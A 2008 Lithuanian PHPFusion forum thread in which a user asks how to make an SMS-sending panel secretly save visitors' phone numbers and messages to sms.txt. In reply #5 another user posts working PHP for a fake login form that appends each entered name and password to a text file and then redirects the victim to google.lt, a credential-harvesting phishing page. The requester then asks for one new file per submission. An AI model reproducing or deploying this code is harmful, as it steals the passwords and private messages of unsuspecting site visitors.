Temos pavadinimas: WordPress, Shopify ir PHPFusion programuotojų bendruomenė :: irasymas i sms.txt

Parašė Apocal· 2008 Rugs. 27 18:09:25
#1

Kas gali paredaguoti scirpta, kad viska ka parasai tel. nr ir sms teksta isaugotu i sms.txt

Scriptas

openside("name");
?>
<style type="text/css">
.sms-table {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 11px;
border: thin solid #cccccc;
}
.sms-input {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
color: #cccccc;
border: 1px solid #cccccc;
}
</style>
<form name="form" method="post" action="http://sms.reboot.lt/free_sms.php">
<table width="165" border="0" cellspacing="1" class="sms-table" height="250">
<tr>
<td colspan="2" align="center" bgcolor="#cccccc"><strong><font size="2">
SMS siuntimas</font></strong></td>
</tr>
<tr bgcolor="#FFFFFF">
<td colspan="2"><b>+3706</b> <INPUT name='numb' size=14 maxlength='7'></td>
</tr>
<tr bgcolor="#FFFFFF">
<td colspan="2">Tekstas:<font size="1">(iki 130 simb.)</font><br>
<textarea name="text" cols="25" rows="8" class="sms-input"></textarea></td>
</tr>
<tr>
<td>
<input type="submit" name="Submit" value=" Siūsti ">
</td>
</tr>
<tr align="center" bgcolor="#000000">

</tr>
</table>
</form>
<?
closeside();



Redagavo Apocal· 2008 Rugs. 27 18:09:49

Parašė Apocal· 2008 Rugs. 27 20:09:15
#2

Tai niekas nemokat :/ ?

Parašė Enzo· 2008 Rugs. 27 20:09:52
#3

dabar tiksliai nežinau bet straipsniuose, mačiau kur adminų ip įrašymas ar narių į txt failą

Parašė _Tomas· 2008 Rugs. 27 20:09:19
#4

Buvo apie tai forume kalbėta.

Parašė PyccKuu· 2008 Rugs. 27 21:09:37
#5

<?php

if (isset($_POST['gerai'])) {
           
$vardas = $_POST[vardas];
$slaptazodis = $_POST[slaptazodis];
$failas = fopen('sms.txt', 'a');   
fwrite($failas, "$vardas | $slaptazodis\n");
header("Location: http://google.lt");   

}

else

{

echo "<form method='post' action='".$_SERVER['PHP_SELF']."'>
Vardas: <input type='text' name='vardas'><br>
Slapta&#1102;odis: <input type='password' name='slaptazodis'><br>
<input type='submit' name='gerai' value='Gerai'>
</form>";

}

?>




Paredagavus truputi bus ok ;)

Redagavo PyccKuu· 2008 Rugs. 27 21:09:54

Parašė Apocal· 2008 Rugs. 27 22:09:17
#6

O imanoma padaryti, kad kieviena karta kam nors uzpildzius laukelius ir paspaudus gerai susikurti nauajs failas. 1.txt 2.txt 3.txt 4.txt ir t.t.

Parašė bruzgis· 2008 Rugs. 27 23:09:59
#7

viskas imanoma viskas kainuoja pinigus